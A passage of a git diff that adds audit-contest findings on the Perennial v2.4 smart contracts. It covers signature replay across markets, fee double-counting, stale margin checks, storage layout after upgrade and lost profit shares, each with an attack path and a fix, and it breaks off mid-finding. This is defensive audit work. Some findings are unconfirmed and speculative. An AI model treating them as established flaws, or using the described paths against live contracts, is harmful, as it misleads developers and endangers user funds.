context.local.update(newOrder.collateral); + + + // protect account + if (newOrder.protected()) updateContext.liquidator = msg.sender; + + + // apply referrer + _processReferrer(updateContext, newOrder, newGuarantee, orderReferrer, guaranteeReferrer); + + + // request version, only request new price on non-empty market order + if (!newOrder.isEmpty() && newGuarantee.isEmpty()) oracle.request(IMarket(this), context.account); + + + // after + InvariantLib.validate(context, updateContext, newOrder, newGuarantee); + + + // store + _storeUpdateContext(context, updateContext); + + + // fund + if (newOrder.collateral.sign() == 1) token.pull(msg.sender, UFixed18Lib.from(newOrder.collateral.abs())); + if (newOrder.collateral.sign() == -1) token.push(msg.sender, UFixed18Lib.from(newOrder.collateral.abs())); + + + // events + } + +When a new order is submitted (via _update), both the global (context.latestPositionGlobal) and local (context.latestPositionLocal) positions are immediately updated with the order’s amounts (e.g., maker, long, short). + +Example: A user opens a long position of +100. The global/long position increases by 100 instantly. + +The order is added to pendingGlobal/pendingLocal to await settlement. + +During settlement (_processOrderGlobal/_processOrderLocal), the code checks if the oracle version associated with the order is valid: + +if (!oracleVersion.valid) newOrder.invalidate(newGuarantee); +If invalid, the order is "invalidated" (its amounts are zeroed out). + +The invalidated order (now zeroed) is subtracted from the pending aggregate: + +context.pendingGlobal.sub(newOrder); // Subtracts zero +Position Not Reverted: + +The global/local positions (context.latestPositionGlobal/context.latestPositionLocal) remain updated with the original (now invalid) order amounts. + +The positions are never rolled back to their pre-order state. + + + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +A user submits an order increasing their position by X. + +The pending and current positions are updated to include X. + +Settlement finds the oracle version invalid, invalidates the order (sets amounts to zero), subtracts the pending, but doesn't revert the position. + +The user's position remains increased by X, despite the order being invalid, leading to incorrect accounting. + +### Impact + +This allows invalid orders to permanently alter positions, leading to incorrect collateral requirements, exposure calculations, and potential financial exploitation. + +### PoC + +_No response_ + +### Mitigation + +When invalidating an order during settlement, revert the position changes made when the order was initially added. This can be done by subtracting the original order amounts from the current positions during invalidation. + +Only update positions after an order is validated during settlement, not when it’s initially placed. \ No newline at end of file diff --git a/015.md b/015.md new file mode 100644 index 0000000..a79d4b0 --- /dev/null +++ b/015.md @@ -0,0 +1,100 @@ +Mammoth Mocha Koala + +Medium + +# Missing Domain-Caller Validation + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Verifier.sol#L42C5-L52C1 + +The Verifier contract fails to enforce that a signed message’s domain field (if set) matches the address of the contract calling the verification function (msg.sender). This allows signatures intended for one context (e.g., a specific market) to be replayed in unintended contexts (e.g., a different market), violating domain isolation and enabling signature reuse across domains + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Verifier.sol#L42C5-L52C1 + + function verifyFill(Fill calldata fill, bytes calldata signature) + external + validateAndCancel(fill.common, signature) + { + if (!SignatureChecker.isValidSignatureNow( + fill.common.signer, + _hashTypedDataV4(FillLib.hash(fill)), + signature + )) revert VerifierInvalidSignerError(); + } + + + +EIP-712 signatures include a domain separator to cryptographically bind a signature to a specific context (e.g., a specific contract or "domain"). This prevents replaying signatures across different contexts. + +In the Verifier contract, messages like Fill, Intent, or Take include a common.domain field. If set, this domain should restrict the message’s validity to only the specified contract (e.g., a market address). + + +The Verifier contract does not validate that msg.sender matches common.domain during signature verification. For example: + + +function verifyFill(Fill calldata fill, bytes calldata signature) + external + validateAndCancel(fill.common, signature) +{ + // No check that `msg.sender == fill.common.domain` + if (!SignatureChecker.isValidSignatureNow(...)) revert(...); +} +This allows a malicious actor to submit a message with domain = Market A to Market B, bypassing the intended domain isolation. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +Valid Signature for Market A: + +A user signs a Fill message with domain = Market A. + +The message is intended to execute a trade only in Market A. + +Replay Attack on Market B: + +An attacker calls Verifier.verifyFill(fillMessage, signature) from Market B (not Market A). + +The Verifier approves the signature because it does not check if msg.sender == fill.common.domain. + +Unauthorized Execution: + +Market B processes the fill intended for Market A, leading to unintended trades, liquidity manipulation, or financial loss. + +### Impact + +Attackers can reuse signatures in unintended contexts (e.g., different markets). +Valid signatures meant for one domain can execute actions in another domain, violating trust boundaries. + +### PoC + +_No response_ + +### Mitigation + +Add a check to enforce that msg.sender matches the common.domain (if the domain is set): + +modifier validateDomain(Common calldata common) { + if (common.domain != address(0) && common.domain != msg.sender) { + revert VerifierInvalidDomainError(); + } + _; +} + +// Apply modifier to verification functions: +function verifyFill(Fill calldata fill, bytes calldata signature) + external + validateDomain(fill.common) // + validateAndCancel(fill.common, signature) +{ + // ... +} \ No newline at end of file diff --git a/016.md b/016.md new file mode 100644 index 0000000..ad6ea2b --- /dev/null +++ b/016.md @@ -0,0 +1,115 @@ +Mammoth Mocha Koala + +Medium + +# Double Subtraction of Fees + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L57C1-L98C6 + +The Double Subtraction of Fees issue occurs when fees already accounted for in the previous checkpoint’s collateral balance are subtracted again when computing the next checkpoint’s collateral. This results in fees being deducted twice, artificially reducing the collateral balance. + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L57C1-L98C6 + +library CheckpointLib { + /// @notice Accumulate pnl and fees from the latest position to next position + /// @param order The next order + /// @param fromVersion The previous latest version + /// @param toVersion The next latest version + /// @return next The next checkpoint + /// @return response The accumulated pnl and fees + function accumulate( + IMarket.Context memory context, + IMarket.SettlementContext memory settlementContext, + uint256 orderId, + Order memory order, + Guarantee memory guarantee, + Version memory fromVersion, + Version memory toVersion + ) external returns (Checkpoint memory next, CheckpointAccumulationResponse memory) { + CheckpointAccumulationResult memory result; + + + // accumulate + result.collateral = _accumulateCollateral(context.latestPositionLocal, fromVersion, toVersion); + result.priceOverride = _accumulatePriceOverride(guarantee, toVersion); + (result.tradeFee, result.subtractiveFee, result.solverFee) = _accumulateFee(order, guarantee, toVersion); + result.offset = _accumulateOffset(order, guarantee, toVersion); + result.settlementFee = _accumulateSettlementFee(order, guarantee, toVersion); + result.liquidationFee = _accumulateLiquidationFee(order, toVersion); + + + // update checkpoint + next.collateral = settlementContext.latestCheckpoint.collateral + .sub(settlementContext.latestCheckpoint.tradeFee) // trade fee processed post settlement + .sub(Fixed6Lib.from(settlementContext.latestCheckpoint.settlementFee)); // settlement / liquidation fee processed post settlement + next.collateral = next.collateral + .add(settlementContext.latestCheckpoint.transfer) // deposit / withdrawal processed post settlement + .add(result.collateral) // incorporate collateral change at this settlement + .add(result.priceOverride); // incorporate price override pnl at this settlement + next.transfer = order.collateral; + next.tradeFee = Fixed6Lib.from(result.tradeFee).add(result.offset); + next.settlementFee = result.settlementFee.add(result.liquidationFee); + + + emit IMarket.AccountPositionProcessed(context.account, orderId, order, result); + + + return (next, _response(result)); + } + +Each checkpoint’s collateral value is intended to reflect the net balance after all prior fees (e.g., tradeFee, settlementFee) have been applied. + +For example, if the previous checkpoint’s collateral is 100 and a tradeFee of 10 was applied, the collateral in that checkpoint should already be 90 (i.e., 100 - 10). + +next.collateral = settlementContext.latestCheckpoint.collateral + .sub(settlementContext.latestCheckpoint.tradeFee) // ❌ Subtracts fees again + .sub(Fixed6Lib.from(settlementContext.latestCheckpoint.settlementFee)); // ❌ +Here, the code subtracts the previous checkpoint’s tradeFee and settlementFee from latestCheckpoint.collateral, which already includes these deductions from prior computations. This double-counts the fees. + +Example +Initial State: + +latestCheckpoint.collateral = 100 + +latestCheckpoint.tradeFee = 10 (already deducted to reach 100). + +Erroneous Calculation: + +next.collateral = 100 (previous collateral) - 10 (tradeFee) = 90. + +Result: Collateral becomes 90, but it should remain 100 (since the 10 fee was already subtracted in the prior checkpoint). + +Impact: + +Collateral is reduced by 10 again, leading to an incorrect balance of 90 instead of 100. + +Over time, this error compounds, disproportionately penalizing users by over-deducting fees. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Over time, this error compounds, disproportionately penalizing users by over-deducting fees. + +### PoC + +_No response_ + +### Mitigation + +Remove the redundant subtraction of prior fees when computing next.collateral: + diff --git a/017.md b/017.md new file mode 100644 index 0000000..406c3ff --- /dev/null +++ b/017.md @@ -0,0 +1,167 @@ +Mammoth Mocha Koala + +Medium + +# Margin Check Uses Outdated Collateral Value + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19C5-L93C14 + +The Margin Check Uses Outdated Collateral Value issue occurs when the system verifies whether a position has sufficient collateral to remain solvent but uses the collateral value before applying changes from the new order. This allows users to withdraw collateral excessively, leaving the position undercollateralized after the update. + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19C5-L93C14 + + function validate( + IMarket.Context memory context, + IMarket.UpdateContext memory updateContext, + Order memory newOrder, + Guarantee memory newGuarantee + ) external { + // emit created event first due to early return + emit IMarket.OrderCreated( + context.account, + newOrder, + newGuarantee, + updateContext.liquidator, + updateContext.orderReferrer, + updateContext.guaranteeReferrer + ); + + + if ( + context.pendingLocal.invalidation != 0 && // pending orders are partially invalidatable + context.pendingLocal.neg().gt(context.latestPositionLocal.magnitude()) // total pending close is greater than latest position + ) revert IMarket.MarketOverCloseError(); + + + if (newOrder.protected() && !_validateProtection(context, newOrder)) + revert IMarket.MarketInvalidProtectionError(); + + + if ( + !(context.latestPositionLocal.magnitude().isZero() && context.pendingLocal.isEmpty()) && // sender has no position + !(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change + ( + !context.latestOracleVersion.valid || + context.currentTimestamp - context.latestOracleVersion.timestamp >= context.riskParameter.staleAfter + ) // price is not stale + ) revert IMarket.MarketStalePriceError(); + + + if (context.marketParameter.closed && newOrder.increasesPosition()) + revert IMarket.MarketClosedError(); + + + if ( + updateContext.currentPositionGlobal.maker.gt(context.riskParameter.makerLimit) && + newOrder.increasesMaker() + ) revert IMarket.MarketMakerOverLimitError(); + + + if (!updateContext.currentPositionLocal.singleSided()) revert IMarket.MarketNotSingleSidedError(); + + + if ( + (!context.latestPositionLocal.maker.isZero() && !updateContext.currentPositionLocal.skew().isZero()) || + (!context.latestPositionLocal.skew().isZero() && !updateContext.currentPositionLocal.maker.isZero()) + ) revert IMarket.MarketNotSingleSidedError(); + + + if (context.pendingLocal.invalidation != 0 && context.pendingLocal.crossesZero()) + revert IMarket.MarketNotSingleSidedError(); + + + if (newGuarantee.priceDeviation(context.latestOracleVersion.price).gt(context.marketParameter.maxPriceDeviation)) + revert IMarket.MarketIntentPriceDeviationError(); + + + if (newOrder.protected()) return; // The following invariants do not apply to protected position updates (liquidations) + + + if ( + !updateContext.signer && // sender is relaying the account's signed intention + !updateContext.operator && // sender is operator approved for account + !(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO)) // sender is depositing zero or more into account, without position change + ) revert IMarket.MarketOperatorNotAllowedError(); + + + if ( + context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal || + context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal + ) revert IMarket.MarketExceedsPendingIdLimitError(); + + + if ( + !PositionLib.margined( + updateContext.currentPositionLocal.magnitude(), + context.latestOracleVersion, + context.riskParameter, + updateContext.collateralization, + context.local.collateral.add(newGuarantee.priceAdjustment(context.latestOracleVersion.price)) // apply price override adjustment from intent if present + ) + +Margin Check Logic: + +The margin check ensures: + +PositionLib.margined( + updateContext.currentPositionLocal.magnitude(), + context.latestOracleVersion, + context.riskParameter, + updateContext.collateralization, + context.local.collateral.add(newGuarantee.priceAdjustment(...)) // ❌ Uses outdated collateral +) +Here, context.local.collateral is the collateral balance before applying newOrder.collateral (e.g., a withdrawal). + +newOrder.collateral represents a change (e.g., withdrawal) to the collateral balance. If this delta is not included in the margin check, the calculation uses an outdated value, ignoring the impact of the current order. + +Example Scenario +Initial State: + +Current collateral: 100 + +Required margin: 50 + +New order: Withdraw 80 collateral (newOrder.collateral = -80). + +Erroneous Check: + +The margin check uses context.local.collateral = 100 (pre-withdrawal value). + +Calculation: 100 ≥ 50 → check passes. + +Result: Collateral after withdrawal = 20 (insufficient for the required 50 margin). + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +The protocol allows withdrawals that should be blocked, risking insolvency. The position becomes undercollateralized, violating system invariants. + + +### PoC + +_No response_ + +### Mitigation + +Include the newOrder.collateral delta in the margin check to use the updated collateral value: + + +// Corrected Code +context.local.collateral + .add(newOrder.collateral) // Include the collateral delta from the new order + .add(newGuarantee.priceAdjustment(...)) diff --git a/018.md b/018.md new file mode 100644 index 0000000..982ce80 --- /dev/null +++ b/018.md @@ -0,0 +1,92 @@ +Mammoth Mocha Koala + +Medium + +# Inverted Taker Fee Logic in from() + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Guarantee.sol#L63C5-L78C6 + +The from() function is intended to create a Guarantee from an Order, including determining whether a taker fee should be charged. However, the logic for setting takerFee is inverted, leading to incorrect fee exemptions. + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Guarantee.sol#L63C5-L78C6 + + function from( + Order memory order, + Fixed6 priceOverride, + UFixed6 solverReferralFee, + bool chargeTradeFee + ) internal pure returns (Guarantee memory newGuarantee) { + newGuarantee.orders = order.orders; + + + (newGuarantee.longPos, newGuarantee.longNeg, newGuarantee.shortPos, newGuarantee.shortNeg) = + (order.longPos, order.longNeg, order.shortPos, order.shortNeg); + newGuarantee.takerFee = chargeTradeFee ? UFixed6Lib.ZERO : order.takerTotal(); + + + newGuarantee.notional = taker(newGuarantee).mul(priceOverride); + newGuarantee.orderReferral = order.takerReferral; + newGuarantee.solverReferral = order.takerReferral.mul(solverReferralFee); + } + + +newGuarantee.takerFee = chargeTradeFee ? UFixed6Lib.ZERO : order.takerTotal(); // ❌ +chargeTradeFee: A boolean flag indicating whether the order should incur a taker fee. + +Intended Behavior: + +If chargeTradeFee is true: The order should pay the fee (takerFee = order.takerTotal()). + +If chargeTradeFee is false: The order should be exempt (takerFee = 0). + +Actual Behavior: + +The code does the opposite: It sets takerFee to 0 when chargeTradeFee is true, and charges the fee when chargeTradeFee is false. + +Example +Order Parameters: + +chargeTradeFee = true (fee should apply). + +order.takerTotal() = 10 (fee amount). + +Result: + +takerFee = 0 (fee is waived despite chargeTradeFee being true). + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +The protocol loses expected revenue. + +Users bypass fees they should pay, violating system invariants. + +### PoC + +_No response_ + +### Mitigation + +Flip the ternary condition to align with the intended logic: + + +newGuarantee.takerFee = chargeTradeFee ? order.takerTotal() : UFixed6Lib.ZERO; // +Corrected Behavior +chargeTradeFee = true → Fee charged (takerFee = order.takerTotal()). + +chargeTradeFee = false → Fee exempt (takerFee = 0). \ No newline at end of file diff --git a/019.md b/019.md new file mode 100644 index 0000000..968b9ec --- /dev/null +++ b/019.md @@ -0,0 +1,91 @@ +Small Hazel Lemur + +Medium + +# Corrupted storage after upgrade in the contract + +### Summary + +Corrupted storage after upgrade in the contract + +### Root Cause + +from the commit differences we can see that +`uint256 invalidation;` +is not placed after all variables + +After the upgrade, the newly upgraded smart contract would be +reading from storage slots that contain data no longer corresponding to the new +storage layout. This would cause the system to break in an unpredictable manner, +depending on the number of storage slots added as part of the upgrade + +```solidity + /// @dev The invalidation status semaphore (local only) + /// (0 = no invalidation possible / intent only, 1+ = partially or fully invalidatable) + uint256 invalidation; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 makerReferral; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 takerReferral; +} +``` +[types/Order.sol#L46](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/0a9028e2d9f4b4821e11ce3b185f1b69a338b078/perennial-v2/packages/core/contracts/types/Order.sol#L46) + +![Online Image](https://i.ibb.co/k00vFMD/image.png) + +the same you can see at currenlty deployed version, takerReferral is the last: + +```solidity + /// @dev The negative skew short order size + UFixed6 shortNeg; + + /// @dev The protection status semaphore (local only) + uint256 protection; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 makerReferral; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 takerReferral; +} +``` +[0x17ebca0060c3e84812ab4e208cc33e5fd8a3b255#code#F51#L46](https://arbiscan.io/address/0x17ebca0060c3e84812ab4e208cc33e5fd8a3b255#code#F51#L46) +### Internal pre-conditions + +_No response_ + +### External pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +1) Corrupted storage of the Order contract. +2) System would break in an unpredictable manner. +similar issue was in [previous contest](https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-judging/issues/53) +### PoC + +_No response_ + +### Mitigation + +```diff + /// @dev The invalidation status semaphore (local only) + /// (0 = no invalidation possible / intent only, 1+ = partially or fully invalidatable) +- uint256 invalidation; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 makerReferral; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 takerReferral; + ++ uint256 invalidation; +} +``` \ No newline at end of file diff --git a/020.md b/020.md new file mode 100644 index 0000000..b40d14f --- /dev/null +++ b/020.md @@ -0,0 +1,67 @@ +Small Hazel Lemur + +Medium + +# _ineligible() inside redemptionEligible is slightly miscalculated + +### Summary + +_ineligible() inside redemptionEligible is slightly miscalculated + +### Root Cause + +claimAmount doesn't equal claimAssets, so whenever eligible redemption is calculated to get +latest global assets before withdrawal, there should be addition of claimAssets, which is happening in +`context.global.update` before calling `_manage` + +```solidity + // asses socialization + UFixed6 claimAmount = _socialize(context, claimAssets); + + // update positions +-> context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.currentCheckpoint.update(depositAssets, redeemShares); + + // manage assets + asset.pull(msg.sender, UFixed18Lib.from(depositAssets)); +-> _manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); + asset.push(msg.sender, UFixed18Lib.from(claimAmount)); + +``` +[vault/contracts/Vault.sol#L463](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/0a9028e2d9f4b4821e11ce3b185f1b69a338b078/perennial-v2/packages/vault/contracts/Vault.sol#L463) + +similar to [issue before](https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-judging/issues/36) + +### Internal pre-conditions + +### External pre-conditions + +### Attack Path + +### Impact + +One of the main effects of _ineligible() is that this part cannot be used as an +asset to open a position; if this value is too small, too many positions are opened, +resulting in the inability to claimAssets properly. +### PoC + +### Mitigation +use claimAssets to get context.global.assets before withdrawal + +```diff +- function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { ++ function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance, UFixed6 claimAssets) private { + if (context.totalCollateral.lt(Fixed6Lib.ZERO)) return; + +- Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); ++ Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, claimAssets)); + + for (uint256 marketId; marketId < context.registrations.length; marketId++) + if (targets[marketId].collateral.lt(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); + for (uint256 marketId; marketId < context.registrations.length; marketId++) + if (targets[marketId].collateral.gte(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); + } +``` \ No newline at end of file diff --git a/021.md b/021.md new file mode 100644 index 0000000..727e50b --- /dev/null +++ b/021.md @@ -0,0 +1,22 @@ +Lucky Peach Barbel + +Medium + +# orders can be executed at incorrect timestamps, leading to mismatched market states and potential financial losses + +The bug arises in the [_processOrderGlobal](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L860-L899) and [_processOrderLocal](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L905-L946) functions, where the contract fails to correctly handle pending orders whose timestamps fall between the current position's timestamp and the latest oracle version. Specifically, the contract incorrectly advances the order's timestamp to the latest oracle version if `newOrderTimestamp > newOrder.timestamp`, without considering whether the pending order's timestamp is within the valid range for processing. This logic flaw is demonstrated [in the following code snippet](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L872-L875): + +```solidity +if (newOrderTimestamp > newOrder.timestamp) { + newOrder.next(newOrderTimestamp); // @audit Incorrectly advances the order + newGuarantee.next(); +} +``` + +For example, if the latest oracle version has a timestamp of `100`, the current position's timestamp is `90`, and a pending order has a timestamp of `95`, the contract will incorrectly advance the order to timestamp `100` instead of processing it at `95`. This results in orders being executed at incorrect timestamps, leading to mismatched market states and potential financial losses. + +### **Impact** +Pending orders are processed at the wrong timestamps, causing discrepancies between the expected and actual state of the market. This can lead to financial losses for users due to missed opportunities. + +### **Mitigation** +Modify the logic to ensure pending orders are processed at their correct timestamps by checking if `newOrderTimestamp` falls within the valid range between the current position's timestamp and the latest oracle version. \ No newline at end of file diff --git a/022.md b/022.md new file mode 100644 index 0000000..c778abb --- /dev/null +++ b/022.md @@ -0,0 +1,105 @@ +Raspy Black Giraffe + +High + +# Vault and Market Contracts Will Cause Over-Leveraged Positions Affecting Vault Users + +### Summary + +The absence of risk parameter validation in both the Vault’s _retarget function and the Market contract’s update functions will cause vault users to suffer losses due to over-leveraged or under-collateralized positions. + +### Root Cause + +In [Vault.sol:_retarget](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/vault/contracts/Vault.sol#L479-L491): +The function directly calls market.update without validating target positions against the Market’s risk parameters (max leverage, position size, collateral requirements) +```solidity +function _retarget( + Registration memory registration, + Target memory target, + bool shouldRebalance +) private { + registration.market.update( + address(this), + shouldRebalance ? target.maker : Fixed6Lib.ZERO, + shouldRebalance ? target.taker : Fixed6Lib.ZERO, + target.collateral, + address(0) + ); +} +``` +In [Market.sol:update](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/core/contracts/Market.sol#L283-L315) functions: +The Market’s update functions lack explicit safeguards for risk parameters +```solidity +function update( + address account, + UFixed6 newMaker, + UFixed6 newLong, + UFixed6 newShort, + Fixed6 collateral, + bool protect, + address referrer +) public nonReentrant whenNotPaused { + // No visible checks for max leverage or collateral adequacy + Order memory newOrder = OrderLib.from(...); // Risk checks not confirmed + _updateAndStore(...); // Implementation hidden +} +``` + + + +### Internal Pre-conditions + +1- The Vault’s strategy (_strategy) generates target positions exceeding the Market’s risk limits. +2- The Market’s internal functions (_updateAndStore, OrderLib.from) fail to enforce RiskParameter constraints (e.g., maxLeverage, minCollateral). +3- The Market’s updateRiskParameter function does not retroactively validate existing positions. + +### External Pre-conditions + +1- The Market’s oracle provides volatile prices that exacerbate over-leveraged positions. + +### Attack Path + +1- The Vault’s strategy calculates a target position exceeding the Market’s maxLeverage (e.g., 10x leverage when the Market allows 5x). +2- The Vault calls _retarget, passing the invalid target to market.update. +3- The Market’s update function processes the request without validating against RiskParameter constraints. +4- The Market’s internal functions (e.g., _updateAndStore) fail to reject the over-leveraged position. +5- During market volatility, the position becomes under-collateralized and is liquidated, causing losses to vault users. + +### Impact + +Vault users suffer a complete loss of deposited assets due to forced liquidations or protocol insolvency. The Market may accumulate bad debt, destabilizing the entire protocol + +### PoC + +_No response_ + +### Mitigation + +1- Vault-Level Fix: Add explicit risk checks in _retarget before calling market.update : +```solidity +function _retarget(...) private { + // Fetch Market’s risk parameters + RiskParameter memory params = registration.market.riskParameter(); + + // Validate leverage + UFixed6 leverage = target.leverage(); // Calculate leverage based on position/collateral + require(leverage.lte(params.maxLeverage), "Vault: Over-leveraged"); + + // Validate collateral + require(target.collateral.gte(params.minCollateral), "Vault: Insufficient collateral"); + + // Proceed with update + registration.market.update(...); +} +``` +2- Market-Level Fix: Ensure internal functions (_updateAndStore, OrderLib.from) enforce risk parameters : +```solidity +// Inside Market.sol’s _updateAndStore: +function _updateAndStore(...) internal { + // Validate against RiskParameter + RiskParameter memory params = riskParameter(); + require(position.size().lte(params.maxPosition), "Market: Position too large"); + require(collateral.gte(params.minCollateral), "Market: Insufficient collateral"); + // ... +} +``` \ No newline at end of file diff --git a/023.md b/023.md new file mode 100644 index 0000000..e29b3af --- /dev/null +++ b/023.md @@ -0,0 +1,61 @@ +Raspy Black Giraffe + +High + +# The incorrect condition in liquidity checks will allow liquidity rule bypass for increasing taker orders + +### Summary + +A missing conditional check in liquidityChecks() will cause a bypass of liquidity rules for increasing taker orders as the function improperly applies liquidity checks under unintended scenarios. This inconsistency could lead to systemic risks in market stability + +### Root Cause + +Root Cause + +In [liquidityChecks()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/core/contracts/types/Order.sol#L234-L248) the condition : +```solidity +return !marketParameter.closed && + ((long(self).isZero() && short(self).isZero()) || increasesTaker(self)); +``` +includes increasesTaker(self) as a condition under which liquidity checks apply. This contradicts the intended behavior stated in the comment, which implies liquidity checks should not apply to increasing taker orders. + + +### Internal Pre-conditions + +1. The market must be open +2. The order must either have no position changes +(long(self).isZero() && short(self).isZero() == true) + or be an increasing taker order +(increasesTaker(self) == true). + + +### External Pre-conditions + +_No response_ + +### Attack Path + +1. A user submits an increasing taker order. +2. The liquidityChecks() function evaluates the order. +3. Liquidity checks improperly apply (or fail to bypass) due to the inclusion of increasesTaker(self) in the condition. + +### Impact + +The protocol may allow invalid orders to bypass liquidity rules incorrectly. This could lead to: + +1. Collateral underfunding for increasing taker orders. +2. Systemic risk of market destabilization due to insufficient liquidity enforcement. + +Potential Loss: This depends on the volume and leverage of increasing taker orders. In a worst-case scenario, it could result in cascading liquidation events or insolvency. + +### PoC + +_No response_ + +### Mitigation + +To resolve this issue, revise the condition in liquidityChecks() to ensure increasing taker orders bypass liquidity checks when appropriate. For example: +```solidity +return !marketParameter.closed && + ((long(self).isZero() && short(self).isZero()) || !increasesTaker(self)); +``` \ No newline at end of file diff --git a/024.md b/024.md new file mode 100644 index 0000000..7363388 --- /dev/null +++ b/024.md @@ -0,0 +1,98 @@ +Rapid Slate Corgi + +High + +# Vault.settle(account=coordinator) will lose profitShares + +### Summary + +`Vault.settle()` turns a portion of the profit into `profitShares` for `coordinator`. +Use method `_credit()` to save `profitShares` to `storage`. But it doesn't update the memory variable `context.local.shares`. +It doesn't take into account the case where `account == coordinator`. +This way, if you maliciously specify that the settlement account is `coordinator`, `settle()` will end up overwriting the new value with the old value in memory. +Resulting in loss of `profitShares`. + +### Root Cause + +[/Vault.sol#L390](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L390) +`settle()` call `_credit()` +```solidity + function _settle(Context memory context, address account) private { +... + while ( + context.global.current > context.global.latest && + context.latestTimestamp >= (nextCheckpoint = _checkpoints[context.global.latest + 1].read()).timestamp + ) { + // process checkpoint + UFixed6 profitShares; + (context.mark, profitShares) = nextCheckpoint.complete( + context.mark, + context.parameter, + _checkpointAtId(context, nextCheckpoint.timestamp) + ); + context.global.shares = context.global.shares.add(profitShares); +@=> _credit(coordinator, profitShares); +``` + +in [Vault.sol#L424](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L424) +save to storage but don't update `context.local.shares` +```solidity + function _credit(address account, UFixed6 shares) internal virtual { + Account memory local = _accounts[account].read(); + local.shares = local.shares.add(shares); +@=> _accounts[account].store(local); + } +``` + +but at the last `_saveContext()` save `context.local.shares` to storage, it will override `_credit()` value if account == coordinator +```solidity + function _saveContext(Context memory context, address account) private { +@=> if (account != address(0)) _accounts[account].store(context.local); + _accounts[address(0)].store(context.global); + _checkpoints[context.currentId].store(context.currentCheckpoint); + mark = context.mark; + } +``` + + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +Example context[coordinator].local.shares = 0 + +1. anyone call `settle(account = coordinator)` +2. suppose profitShares = 10 +3. in `_credit()` save storage `_accounts[coordinator].shares = profitShares = 10` , but `context.local.shares` still 0 +4. at last `_saveContext()` will overwrite `_accounts[coordinator].shares = context.local.shares = 0` +5. coordinator lose 10 shares + +### Impact + +coordinator lose `profitShares` + +### PoC + +_No response_ + +### Mitigation + +like `Market.sol#_credit()`, if coordinator == context.account , only change `context.local.shares` + +```diff +- function _credit(address account, UFixed6 shares) internal virtual { ++ function _credit(Context memory context, address account, UFixed6 shares) internal virtual { ++ if (account == context.account) context.local.shares = context.local.shares.add(shares) ++ else { + Account memory local = _accounts[account].read(); + local.shares = local.shares.add(shares); + _accounts[account].store(local); ++ } + } +``` \ No newline at end of file diff --git a/025.md b/025.md new file mode 100644 index 0000000..b62cbe7 --- /dev/null +++ b/025.md @@ -0,0 +1,39 @@ +Shambolic Mint Dinosaur + +High + +# Oracle Data Validation Gaps + +### Summary + +The Market.sol contract does not 